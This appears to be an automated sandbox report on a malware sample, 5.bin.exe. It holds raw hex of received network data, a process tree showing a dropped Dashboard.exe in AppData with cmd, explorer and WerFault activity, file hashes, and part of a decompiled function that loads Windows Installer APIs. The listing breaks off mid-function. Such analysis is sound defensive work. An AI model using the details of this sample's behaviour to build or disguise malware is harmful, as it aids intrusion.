                                                                                                                  2023-08-29 17:16:42 UTC1848INData Raw: c7 a1 18 ab c8 5b 71 b1 44 c3 f5 b0 44 f9 18 5b 55 ac 44 13 89 4e 19 85 ce a5 dd 51 a9 88 59 17 00 bd f8 9a 24 41 53 58 e4 4f 90 f1 72 41 92 f2 4d ca 91 10 5d c2 db d7 c6 98 19 b0 04 a9 90 9d a1 8e 5c 71 57 c9 1f 71 5a 09 19 ba 4d c4 4c 08 c5 7e fd 89 45 72 f9 81 45 58 f8 b7 47 0b 73 c8 45 46 af 10 c0 89 6c d7 77 41 d9 39 68 49 11 ba 05 c4 54 fa c5 49 4a 0c e5 4c c1 53 31 18 f1 96 9d 29 70 f2 40 99 9c 02 67 4c 1a 81 65 4c de 95 ad 6a 15 3c 61 45 5c 9a ad e9 12 44 25 4e 89 82 07 54 49 14 ad e9 fc d6 8d cc d0 32 43 d8 42 90 ce 1c f9 53 87 59 a9 d8 c6 49 c9 d0 cc 1c d9 59 00 8d 5b 69 e4 62 9c 19 4a cd 18 c9 82 17 5c f1 2c 29 19 b1 25 cb 12 00 e5 41 f1 04 c6 89 d9 d5 a9 a9 14 81 04 40 f8 db 43 0a dc d5 a4 42 1d e2 85 a2 68 d1 65 67 90 9d bd c2 4c 00 cc c9 4c
                                                                                                                  Data Ascii: [qDD[UDNQY$ASXOrAM]\qWqZML~ErEXGsEFlwA9hITIJLS1)p@gLeLj<aE\D%NTI2CBSYIY[ibJ\,)%A@CBhegLL
                                                                                                                  2023-08-29 17:16:42 UTC1852INData Raw: 21 45 92 92 79 19 51 5b 0f 71 1a 98 7e b5 18 98 55 f8 1a 98 0a 23 19 c1 09 49 0d e4 45 5d 1f e0 44 5d 19 12 4d 19 f1 55 b3 48 18 ba 65 46 af 18 c0 80 6d d2 4c 49 0f 16 07 28 18 3b 55 c8 19 ad c6 31 45 d0 30 4e 19 95 d5 8f 58 b1 44 4b 78 19 a9 48 32 c0 41 14 da 1c 45 49 4c 5b a9 4b 48 d0 04 c2 54 d8 46 01 25 d0 cc 04 e5 5b 10 b5 98 ea 45 19 5c d0 45 3d 1d e3 85 99 f2 d5 fd 48 18 1a a0 4a 32 d4 6a 09 9a 3c 4d 8e 5c 28 45 5e 19 d0 2d d6 69 49 5c c4 5c 28 47 19 19 8e 14 a1 78 c9 45 49 98 d0 2a c0 5c 2c c6 34 e5 50 7c da 9b cd c5 08 4c 2c c6 18 b8 21 c4 72 97 d8 cc 6f 9c f7 c5 1a 49 ba 40 49 5b c0 14 a1 52 c3 c1 6b e1 5b 10 49 e1 53 7f 49 6c d9 82 0c 03 2c c7 6d 1e d0 41 c8 23 5b 00 b5 52 57 64 cb 06 cc c3 45 11 f5 45 4a 39 fa 31 c9 00 3c c0 50 f5 52 49 04 f5
                                                                                                                  Data Ascii: !EyQ[q~U#IE]D]MUHeFmLI(;U1E0NXDKxH2AEIL[KHTF%[E\E=HJ2j<M\(E^-iI\\(GxEI*\,4P|L,!roI@I[Rk[ISIl,mA#[RWdEEJ91<PRI
                                                                                                                  2023-08-29 17:16:42 UTC1856INData Raw: 16 5e fd e2 41 5e a8 c6 c8 1a 12 51 87 a9 5c d1 44 c4 d8 d3 ad d5 a5 22 41 46 a9 66 95 cc cb a2 46 79 38 24 e5 65 eb 20 65 47 f1 44 87 4f 39 fe 45 13 59 a7 8b a5 4b de b6 37 c9 c6 40 97 c9 94 75 57 11 17 00 b5 6d 80 08 b5 9a 11 49 48 90 e1 1b b9 18 2c 7e cb fd d0 4b 49 19 a3 0c 20 54 2c 6f c3 e9 d1 46 49 1c 35 55 47 22 95 7d 59 6c e3 71 48 d9 7a 94 d2 95 d8 24 e8 72 59 4f 20 4c 83 44 68 18 c0 4b cb 2a e9 b5 3a 78 d4 ae 4d f2 70 49 7a d9 d1 4d ba 1e ba 4d c4 5c f0 bd 19 f1 7b f6 ab 12 b9 08 a1 15 c0 62 48 85 2f 25 72 e9 d8 f5 d6 fb 2f b4 48 73 d0 ba e9 11 67 5c bf 35 d2 61 9d 08 df f3 0c 09 55 85 25 6d c1 95 2c ab 63 ad a9 68 f0 48 a2 6e c0 5b 49 18 10 21 ad 1a d1 01 6d 8b cb 55 1c 3b 4f bd c9 8f 5d 15 73 73 00 03 b9 25 82 c8 08 0a 43 1b 8a 43 91 6d a9 9a
                                                                                                                  Data Ascii: ^A^Q\D"AFfFy8$e eGDO9EYK7@uWmIH,~KI T,oFI5UG"}YlqHz$rYO LDhK*:xMpIzMM\{bH/%r/Hsg\5aU%m,chHn[I!mU;O]ss%CCm
                                                                                                                  2023-08-29 17:16:42 UTC1860INData Raw: 6d c9 fa d0 65 4a f9 d0 e5 0c 2a 19 04 f1 98 e8 ff 29 19 5a c5 48 0f a0 24 07 61 2f 15 6b 90 d2 0d 0b 45 2f 30 4e 2b 10 ac fb b5 f0 41 7a cb 53 14 0a 1d 80 34 17 79 98 ce cd 3d 58 74 6a a9 c1 cc 0b 11 30 47 09 19 a5 54 10 1b e0 75 7b d9 3b 36 38 35 11 64 c2 c9 a6 fc b8 55 74 44 71 aa 9b d0 58 08 bf 01 53 5d f3 6a 1d 28 9d 02 4d 39 55 85 54 46 d5 58 f8 1e 01 49 c8 18 80 0d c0 6e 60 1a 41 1b f0 56 21 f5 eb b6 5a e4 c1 c4 53 f5 21 4e f3 38 d8 d4 0c 21 38 53 e1 f5 2f ba a8 49 c0 57 48 4d f0 0b 02 78 d1 84 4f 89 c0 44 b6 09 61 44 4c 12 41 11 9b 1b 88 95 00 2a 54 61 e1 f2 70 44 c9 1c fc 65 41 35 76 47 19 0d 70 45 d3 b9 33 54 65 19 da 57 4a 9f 29 56 c2 1a f1 0d 2b 1b 81 5d d0 9a 32 42 c9 1a 12 c6 a9 1e fb 87 b8 61 a0 c8 0d 18 d3 7a 6a 7d ac d7 6b 9a c0 bd 53 6a
                                                                                                                  Data Ascii: meJ*)ZH$a/kE/0N+AzS4y=Xtj0GTu{;685dUtDqXS]j(M9UTFXIn`AV!ZS!N8!8S/IWHMxODaDLA*TapDeA5vGpE3TeWJ)V+]2Bazj}kSj
                                                                                                                  2023-08-29 17:16:42 UTC1864INData Raw: 5f 11 09 d2 25 ca 35 80 4a 09 19 a4 63 5e 8e d6 47 18 51 f0 e5 05 05 3b db 53 7e d1 a6 5b 49 8a 35 53 51 f0 07 07 a6 2f 55 4b 1e 2f 55 b6 09 80 43 5b 43 b0 d0 59 98 a1 4d 01 e6 a5 40 a0 9a 30 44 b2 7d dc 46 4b 89 b1 41 e8 13 83 2c 7b 1a 02 2a 4e 19 dc e5 ea 18 d1 0d ca 61 90 45 99 6c d2 ae 03 c9 d6 01 63 5b b1 19 a5 5d 94 16 26 fb f3 15 c9 19 77 40 78 00 e9 05 19 1b 3b 65 37 4e d1 97 6f 9a 14 03 11 2b 8c bf 44 21 6a 4f 29 0f 69 7e 18 38 44 11 b1 f8 9b 64 6f 18 dc 65 49 d9 a5 41 7a d9 3b 0d 1b 1b 62 2e 21 f1 1d 8c f8 92 84 f4 4c f8 d0 9b 37 c2 31 45 ab 77 32 46 fc 35 60 6f 0e 18 d0 3a 9b 1a 91 44 48 41 2c 2b a2 11 c0 ef 7b 75 f0 51 a1 7d 50 43 20 99 c4 55 6e 19 38 45 22 d9 01 f6 69 c8 8f b7 cc c9 8f ad 69 2a 19 91 4c d1 f0 46 fd 44 2f 48 24 48 96 0d 6b 03
                                                                                                                  Data Ascii: _%5Jc^GQ;S~[I5SQ/UK/UC[CYM@0D}FKA,{*NaElc[]&w@x;e7No+D!jO)i~8DdoeIAz;b.!L71Ew2F5`o:DHA,+{uQ}PC Un8E"ii*LFD/H$Hk
                                                                                                                  2023-08-29 17:16:42 UTC1868INData Raw: b6 4b 03 94 17 1e 4d b3 02 fa 15 d8 ad df e3 07 40 56 2e 94 40 db 40 33 44 ee 72 41 fa 54 18 cc 09 3a 3e f2 41 cb 72 80 35 a0 87 f4 d1 89 2a d3 a4 52 c9 85 82 88 18 61 b9 b6 89 93 44 7b 99 c0 60 c3 1c d3 5f f9 07 2f e0 4a 49 95 26 4a 38 d1 94 48 fa d3 e0 26 c9 8c 8a db 0c a7 2a 29 36 12 e2 4d 19 24 89 7a 76 0f 52 58 fc 19 13 84 2a 7b 36 39 49 a6 98 9d 19 00 7d 49 6d cd 95 42 a3 32 13 1f 10 52 0d eb 04 80 ba 59 f2 1a 51 db 89 f8 45 3c 13 e2 1c a0 39 e4 06 38 88 d2 ce c9 95 93 19 fb 30 c1 44 ca 5d 68 c1 f8 01 df c0 bd 13 d5 d5 92 1a fb 72 51 8b 80 9c 49 01 ca 0d 5d 01 c4 43 f1 4b 44 16 44 f1 d7 bf b6 e6 21 45 02 79 d0 30 9b 45 80 50 d9 68 eb 65 a2 59 55 81 4b 93 f2 70 ce e9 d3 a1 00 eb 56 24 1d 14 d8 ad c2 a1 c5 8e 4c 1a 89 bc 99 1c 38 c1 38 20 40 56 2c 2c
                                                                                                                  Data Ascii: KM@V.@@3DrAT:>Ar5*RaD{`_/JI&J8H&*)6M$zvRX*{69I}ImB2RYQE<980D]hrQI]CKDD!Ey0EPheYUKpV$L88 @V,,
                                                                                                                  2023-08-29 17:16:42 UTC1872INData Raw: f7 49 9c b2 f5 49 3d 69 2b fb 19 5d 21 f9 19 6a 2d 9c 2a d2 23 78 1b a4 76 4b 71 e1 47 fa 19 84 c8 23 28 d2 35 7a 1b bc 74 4b 37 85 76 4b 77 e1 47 2d 2a d2 35 78 1b bc 08 7a 1b a2 74 4b aa d0 c0 3d a9 d0 76 63 d0 d0 47 3f bb fc 41 0d 33 ba 21 60 ea fe c0 65 f9 dc c8 9b 10 82 ad 4d 2d e5 44 44 1d 01 a5 19 94 f2 c0 58 18 80 ce c4 f8 d1 14 a1 3d 0e 71 eb 37 5b d0 a8 19 82 ba f8 39 9d 00 9d 92 b2 d5 f9 0a 04 b5 76 6b c6 d1 59 fd 2b f4 5a 48 41 f5 5a cd 78 15 a1 6b 55 44 a1 98 d1 c8 08 8b 71 f5 5a cd 82 ad 10 9c d1 a9 c8 18 3b 77 da ba d4 05 cc 18 28 e7 4d 38 44 e6 4d a3 f7 c0 48 e5 72 41 58 8c 73 41 47 9c d1 0b bd bb d4 44 df ba d4 b0 5c 9d d1 b5 1e bb d4 b4 df ba d4 99 cc 18 d0 95 59 a0 7a 28 4a 0d a8 44 5d 6a d3 51 33 18 c4 ef 3f 1a c4 39 08 0f b3 76 4b 67
                                                                                                                  Data Ascii: II=i+]!j-*#xvKqG#(5ztK7vKwG-*5xztK=vcG?A3!`eM-DDX=q7[9vkY+ZHAZxkUDqZ;w(M8DMHrAXsAGD\Yz(JD]jQ3?9vKg
                                                                                                                  2023-08-29 17:16:42 UTC1876INData Raw: 55 3d 10 d0 08 48 18 9d 42 54 9d 81 cf c9 5f 53 65 c9 06 51 a9 e9 18 d0 4c 21 0b d4 45 49 73 90 04 49 27 5b 0d 55 e6 01 c5 17 a3 f2 47 49 12 b9 87 4d 99 cc 46 0c 59 28 cc 0c d5 69 20 49 11 b6 65 c0 54 6c ff 31 1b d4 10 f7 5b 68 c6 41 5c 10 76 80 99 db 87 49 94 85 f9 c2 54 c0 ad d9 19 cf 45 49 91 95 bb 8e 5c d2 81 c8 2c df f3 1c e7 55 97 41 16 55 cd c9 1c 16 00 95 7a d0 83 0c c4 bd 83 0c c7 b4 45 8f 5c 0f 6b 8f 5c 30 20 c9 df 95 a4 31 df 95 a7 c9 1a d0 a6 69 df 95 a1 66 df 95 4f ac 99 c1 a3 c9 1c 37 36 8f 5c d0 ad 3d df 95 ac 28 df 95 e5 a3 6b 16 00 a2 99 d5 a9 89 1c 70 a8 6b df 95 ab 89 19 3f 85 4b 9b 20 85 48 e8 f5 83 0c eb 10 4f 7b ea 10 47 bd 19 90 19 09 99 38 19 09 04 d0 45 c2 5c c0 c5 0c e1 f0 14 c2 4c 1c 17 4b 2f e4 ba 49 c8 53 81 45 f2 dd ce 1c 99
                                                                                                                  Data Ascii: U=HBT_SeQL!EIsI'[UGIMFY(i IeTl1[hA\vITEI\,UAUzE\k\0 1ifO76\=(kpk?K HO{G8E\LK/ISE
                                                                                                                  2023-08-29 17:16:42 UTC1880INData Raw: 76 09 d8 11 a3 4d 3c df 45 49 2a c0 83 46 d1 8e 34 42 98 3c c9 4a 99 cd 95 42 92 21 cc 3c c1 17 61 0c fd a1 5b f1 f9 d4 7f f3 41 d0 24 7d 19 ba 08 ca d9 9f d5 8e 5c 58 ba 1b 29 5c c6 29 19 5a 1c 09 22 38 45 4b e5 68 b6 78 04 44 10 81 59 e2 22 48 48 a9 16 29 36 42 2a cb 1b 04 0d 2b 19 24 ae 7b 2d 74 b1 38 7b d0 e5 69 5b d1 e1 69 9f d0 45 c0 54 78 82 0c b5 15 4c 4b 18 60 78 29 19 16 00 b1 0a d0 83 0c e0 eb 83 0c e3 e6 f5 8f 5c 2b 8c 48 1f 60 6d 6f 08 d2 11 cc 6d 50 50 3e 8b d0 3d d9 19 cd 48 db 19 ac d5 49 a8 94 82 0c 99 83 4c 2b 19 54 0b 2b 1d 3c f2 8f 5c d0 a8 1e df 95 ab 78 df 95 1d a6 d9 16 b5 ca 79 d4 a7 4b 11 64 d6 a9 07 b0 45 f1 41 b2 45 f5 2a b2 45 6d d9 11 27 49 dd 81 27 49 f9 96 cc 18 56 80 1d a9 1e 0c fd ae 8a c0 55 97 9a 10 8b 29 19 30 c6 88 b1
                                                                                                                  Data Ascii: vM<EI*F4B<JB!<a[A$}\X)\)Z"8EKhxDY"HH)6B*+${-t8{i[iETxLK`x)\+H`momPP>=HIL+T+<\xyKdEAE*Em'I'IVU)0
                                                                                                                  2023-08-29 17:16:42 UTC1884INData Raw: 64 d5 a3 2a 10 88 05 f6 43 e9 e4 88 41 39 40 d4 b4 6b 09 d3 b4 d5 4e f0 b7 5f 25 58 0d 30 1b e1 62 79 18 71 6f f3 05 78 e1 db e8 13 4c 00 71 d5 cd e9 18 d8 04 f0 de 50 4e 0c 2a 10 ff aa d9 d0 d6 48 f1 95 7a d8 19 20 17 38 92 d1 57 48 0a f1 45 49 16 66 85 c8 f9 4b 55 7a cb 98 82 88 e9 00 ad b6 e6 44 77 0e 55 00 c9 ca 1b f0 1c 50 1f d3 77 60 16 d3 47 4a a2 67 45 49 19 5b d1 6d 51 d2 45 49 19 98 ce 05 3d 88 ad f3 1b f1 45 01 90 54 61 f1 1c d0 4d 49 a3 da 45 f9 a0 90 45 49 b9 d0 ba 1d 3d a0 44 1d c1 d0 05 19 58 68 41 48 18 64 d1 4b 2d e3 05 80 e6 44 61 21 1d d0 65 8e 01 54 61 89 19 de 44 49 58 60 44 51 51 5d d1 4b 05 d1 ef 19 f1 d4 ef 7e 1a 90 ed 4a 27 d0 45 5d 71 d0 85 c4 1d c4 09 49 5e d1 45 05 94 5c 47 42 1d 9c c8 4a 30 98 ce 1d 3d 80 47 01 19 c4 e5 40 19
                                                                                                                  Data Ascii: d*CA9@kN_%X0byqoxLqPN*Hz 8WHEIfKUzDwUPw`GJgEI[mQEI=ETaMIEEI=DXhAHdK-Da!eTaDIX`DQQ]K~J'E]qI^E\GBJ0=G@
                                                                                                                  2023-08-29 17:16:42 UTC1888INData Raw: ce cd 3d d0 ad 49 19 d0 0d c2 95 f4 41 29 1d d0 7d 4a d1 98 ce 88 19 98 cc cd 3d e8 46 49 19 e0 82 cd 3d 18 45 39 18 d0 04 f1 99 15 5f e9 56 98 c8 dd 1b 94 44 48 a1 08 48 49 19 38 30 55 8a d0 5d 49 43 98 40 4b 43 64 47 4a 43 f3 45 e3 18 9c 09 c4 95 d2 61 08 a1 ca 05 48 31 00 44 25 18 7e ba dd 3d 5a 05 49 79 94 41 6f 51 5b d1 4b 59 a1 40 57 f1 ef 74 48 15 d3 c6 48 44 80 76 48 05 d0 0e 89 1f d2 7e 4b 17 51 81 5b d1 d0 c5 8a d5 d4 45 01 90 84 45 6d 09 98 cc 05 3d d8 0d c9 9a 3c 0d 8e 5d f4 65 4a ac d0 da 39 80 c9 0d c4 4d f4 45 69 51 5b 09 6d 41 38 80 4b 02 d1 14 0d 3d f8 0d ca 65 d0 61 61 19 a5 41 7b d9 3b 4d 7e 55 5b 45 41 2a 02 fc 49 1d d0 55 49 22 94 61 19 e6 40 51 c1 18 53 56 79 98 c3 75 49 6d da 54 48 06 e0 46 47 49 e0 f5 48 19 3b 47 7b d9 98 c6 8d 51
                                                                                                                  Data Ascii: =IA)}J=FI=E9_VDHHI80U]IC@KCdGJCEaH1D%~=ZIyAoQ[KY@WtHHDvH~KQ[EEm=<]eJ9MEiQ[mA8K=eaaA{;M~U[EA*IUI"a@QSVyuImTHFGIH;G{Q
                                                                                                                  2023-08-29 17:16:42 UTC1892INData Raw: 0d 49 03 d8 05 01 9a 3c 0d c2 5d d0 09 c2 59 9c 61 19 51 d3 44 48 b7 e0 30 48 3b e0 44 5b 21 d1 99 48 8b d4 99 05 11 f4 3d 05 19 cb 35 01 92 84 11 6d 71 d1 77 29 19 b2 7d 49 7b 98 ee 4b 7b c3 1a 71 19 e1 0d 48 35 90 41 16 b3 f0 44 16 39 d1 4c 61 18 82 2d 48 4b fe 25 48 4b d3 c0 49 4b f8 45 1b 21 13 52 79 56 41 67 4e 19 98 42 6a 98 3c ed 39 18 d0 45 8e 19 ec c5 27 98 d3 21 59 ca f1 8e 09 99 d3 01 dd f6 d4 47 42 99 d3 2d 6a 2d 57 62 08 99 d3 29 9b e3 38 5c c9 1a 98 55 94 93 4e cb c9 1a 9c 15 17 1d e4 90 c9 1a 80 da 59 72 95 44 c9 1a 84 b4 fb 71 28 ff 40 3c 54 ff f1 19 fa ad 9c 9a fc 65 49 19 d0 47 49 2a 10 c6 b1 18 c8 4a cd a0 d0 4c 48 4b 5b 95 f0 3b 90 47 5c 9d f4 f5 49 10 2f 15 4b 21 d3 f6 ca 65 f4 7d 49 6c c8 40 a0 88 56 56 48 7b e8 ad c3 70 50 42 05 94
                                                                                                                  Data Ascii: I<]YaQDH0H;D[!H=5mqw)}I{K{qH5AD9La-HK%HKIKE!RyVAgNBj<9E'!YGB-j-Wb)8\UNYrDq(@<TeIGI*JLHK[;G\I/K!e}Il@VVH{pPB
                                                                                                                  2023-08-29 17:16:42 UTC1896INData Raw: 55 49 1b d0 5d 41 1d f8 55 fc 1d d6 65 48 01 90 46 42 19 cf 43 4d 07 f9 40 4e 19 b0 45 4a 1d d3 4f 4a 19 2c 05 cc 1b f8 44 62 1f d7 43 4f 12 d0 45 1b dd 30 44 58 b9 d0 45 45 18 d7 45 3e 1f e8 50 8d 29 d0 6b 3d 7c a8 31 34 99 d3 51 4c 51 51 30 cd 42 d5 45 49 20 b0 45 67 6b b4 24 3d 78 d0 45 d7 a9 d4 4d cb 0a d6 33 4f 44 90 6b 4a 0a dd 46 68 29 43 7c c9 0a 10 6b 3b 6a ac 37 2a 98 61 c4 3c 19 d8 cf f8 90 f7 37 31 7c bc 2a 49 0d 52 38 c9 98 52 56 43 e4 5e 56 0b 66 92 7a 49 26 d0 7a 49 26 d0 6e 49 19 85 ce a5 de d5 45 79 59 1a 45 88 68 71 44 4b 44 13 3a 5c 26 d0 ba 56 19 cf 45 56 19 cf 45 56 19 cf 45 56 19 cf 45 e6 06 d0 5a 49 0c d0 20 ef 14 b0 45 31 79 d0 6b 71 78 44 21 ca 7c d3 4b 25 1f 97 06 55 4d 9c a4 c4 f8 5e 27 d9 3d bd 2b 76 9c 5d a4 d2 fc 5d 24 40 78
                                                                                                                  Data Ascii: UI]AUeHFBCM@NEJOJ,DbCOE0DXEEE>P)k=|14QLQQ0BEI Egk$=xEM3ODkJFh)C|k;j7*a<71|*IR8RVC^VfzI&zI&nIEyYEhqDKD:\&VEVEVEVEZI E1ykqxD!|K%UM^'=+v]]$@x
                                                                                                                  2023-08-29 17:16:42 UTC1900INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:


                                                                                                                  Click to jump to process

                                                                                                                  Click to jump to process

                                                                                                                  Click to dive into process behavior distribution

                                                                                                                  Click to jump to process

                                                                                                                  Target ID:0
                                                                                                                  Start time:19:16:39
                                                                                                                  Start date:29/08/2023
                                                                                                                  Path:C:\Users\user\Desktop\5.bin.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Users\user\Desktop\5.bin.exe
                                                                                                                  Imagebase:0x7ff61b850000
                                                                                                                  File size:1'863'880 bytes
                                                                                                                  MD5 hash:53C1FA0286A21F9269F7C0DD5D6DDCAF
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  Target ID:1
                                                                                                                  Start time:19:16:56
                                                                                                                  Start date:29/08/2023
                                                                                                                  Path:C:\Users\user\AppData\Roaming\msls31\Dashboard.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Users\user\AppData\Roaming\msls31\Dashboard.exe
                                                                                                                  Imagebase:0x1000000
                                                                                                                  File size:145'264 bytes
                                                                                                                  MD5 hash:704925ECFDB24EF81190B82DE0E5453C
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  Target ID:3
                                                                                                                  Start time:19:16:57
                                                                                                                  Start date:29/08/2023
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Imagebase:0xc30000
                                                                                                                  File size:232'960 bytes
                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:4
                                                                                                                  Start time:19:16:57
                                                                                                                  Start date:29/08/2023
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6bab10000
                                                                                                                  File size:625'664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:7
                                                                                                                  Start time:19:17:03
                                                                                                                  Start date:29/08/2023
                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\explorer.exe
                                                                                                                  Imagebase:0x7ff761ba0000
                                                                                                                  File size:3'933'184 bytes
                                                                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:10
                                                                                                                  Start time:19:17:09
                                                                                                                  Start date:29/08/2023
                                                                                                                  Path:C:\Windows\System32\WerFault.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\WerFault.exe -u -p 2172 -s 516
                                                                                                                  Imagebase:0x7ff7008d0000
                                                                                                                  File size:494'488 bytes
                                                                                                                  MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Reset < >
                                                                                                                    C-Code - Quality: 99%
                                                                                                                    			E01014442(void* __ecx) {
                                                                                                                    				intOrPtr _v8;
                                                                                                                    				void* __edi;
                                                                                                                    				struct HINSTANCE__* _t127;
                                                                                                                    				intOrPtr _t128;
                                                                                                                    				struct HINSTANCE__* _t129;
                                                                                                                    				_Unknown_base(*)()* _t176;
                                                                                                                    				void* _t187;
                                                                                                                    
                                                                                                                    				_push(__ecx);
                                                                                                                    				_t187 = __ecx;
                                                                                                                    				_v8 = 0;
                                                                                                                    				if( *((intOrPtr*)(__ecx + 0x10)) == 0) {
                                                                                                                    					 *((intOrPtr*)(__ecx + 0xc)) = 1;
                                                                                                                    					_t127 = E0101415E();
                                                                                                                    					__eflags = _t127;
                                                                                                                    					 *(_t187 + 0x10) = _t127;
                                                                                                                    					if(__eflags == 0) {
                                                                                                                    						L30:
                                                                                                                    						 *((intOrPtr*)(_t187 + 0xc)) = 0;
                                                                                                                    						_t128 = 0x80004005;
                                                                                                                    					} else {
                                                                                                                    						_t129 = E0101439E(1, __eflags, 3, 1, 0);
                                                                                                                    						__eflags = _t129;
                                                                                                                    						if(_t129 < 0) {
                                                                                                                    							goto L30;
                                                                                                                    						} else {
                                                                                                                    							 *(_t187 + 0x80) = GetProcAddress( *(_t187 + 0x10), "MsiSetInternalUI");
                                                                                                                    							 *(_t187 + 0x24) = GetProcAddress( *(_t187 + 0x10), "MsiCloseHandle");
                                                                                                                    							 *(_t187 + 0x40) = GetProcAddress( *(_t187 + 0x10), "MsiGetActiveDatabase");
                                                                                                                    							 *(_t187 + 0x48) = GetProcAddress( *(_t187 + 0x10), "MsiViewExecute");
                                                                                                                    							 *(_t187 + 0x4c) = GetProcAddress( *(_t187 + 0x10), "MsiViewFetch");
                                                                                                                    							 *((intOrPtr*)(_t187 + 0x54)) = GetProcAddress( *(_t187 + 0x10), "MsiRecordGetInteger");
                                                                                                                    							 *((intOrPtr*)(_t187 + 0x58)) = GetProcAddress( *(_t187 + 0x10), "MsiCreateRecord");
                                                                                                                    							 *(_t187 + 0x7c) = GetProcAddress( *(_t187 + 0x10), "MsiEnableLogW");
                                                                                                                    							 *(_t187 + 0x14) = GetProcAddress( *(_t187 + 0x10), "MsiGetProductInfoW");
                                                                                                                    							 *(_t187 + 0x18) = GetProcAddress( *(_t187 + 0x10), "MsiGetPropertyW");
                                                                                                                    							 *(_t187 + 0x1c) = GetProcAddress( *(_t187 + 0x10), "MsiSetPropertyW");
                                                                                                                    							 *(_t187 + 0x88) = GetProcAddress( *(_t187 + 0x10), "MsiOpenPackageW");
                                                                                                                    							 *(_t187 + 0xcc) = GetProcAddress( *(_t187 + 0x10), "MsiSequenceW");
                                                                                                                    							 *(_t187 + 0x20) = GetProcAddress( *(_t187 + 0x10), "MsiDoActionW");
                                                                                                                    							 *(_t187 + 0x28) = GetProcAddress( *(_t187 + 0x10), "MsiSetFeatureStateW");
                                                                                                                    							 *(_t187 + 0x2c) = GetProcAddress( *(_t187 + 0x10), "MsiReinstallFeatureW");
                                                                                                                    							 *(_t187 + 0x84) = GetProcAddress( *(_t187 + 0x10), "MsiSetExternalUIW");
                                                                                                                    							 *(_t187 + 0x38) = GetProcAddress( *(_t187 + 0x10), "MsiGetTargetPathW");
                                                                                                                    							 *(_t187 + 0x3c) = GetProcAddress( *(_t187 + 0x10), "MsiSetTargetPathW");
                                                                                                                    							 *(_t187 + 0x44) = GetProcAddress( *(_t187 + 0x10), "MsiDatabaseOpenViewW");
                                                                                                                    							 *(_t187 + 0x8c) = GetProcAddress( *(_t187 + 0x10), "MsiRecordSetStringW");
                                                                                                                    							 *(_t187 + 0x50) = GetProcAddress( *(_t187 + 0x10), "MsiRecordGetStringW");
                                                                                                                    							 *(_t187 + 0x90) = GetProcAddress( *(_t187 + 0x10), "MsiQueryProductStateW");
                                                                                                                    							 *(_t187 + 0x94) = GetProcAddress( *(_t187 + 0x10), "MsiOpenDatabaseW");
                                                                                                                    							 *(_t187 + 0x98) = GetProcAddress( *(_t187 + 0x10), "MsiInstallProductW");
                                                                                                                    							 *(_t187 + 0x9c) = GetProcAddress( *(_t187 + 0x10), "MsiReinstallProductW");
                                                                                                                    							 *((intOrPtr*)(_t187 + 0x5c)) = GetProcAddress( *(_t187 + 0x10), "MsiSourceListClearAllW");
                                                                                                                    							 *((intOrPtr*)(_t187 + 0x60)) = GetProcAddress( *(_t187 + 0x10), "MsiSourceListAddSourceW");
                                                                                                                    							 *((intOrPtr*)(_t187 + 0x64)) = GetProcAddress( *(_t187 + 0x10), "MsiGetMode");
                                                                                                                    							 *((intOrPtr*)(_t187 + 0x68)) = GetProcAddress( *(_t187 + 0x10), "MsiRecordSetInteger");
                                                                                                                    							 *((intOrPtr*)(_t187 + 0x6c)) = GetProcAddress( *(_t187 + 0x10), "MsiProcessMessage");
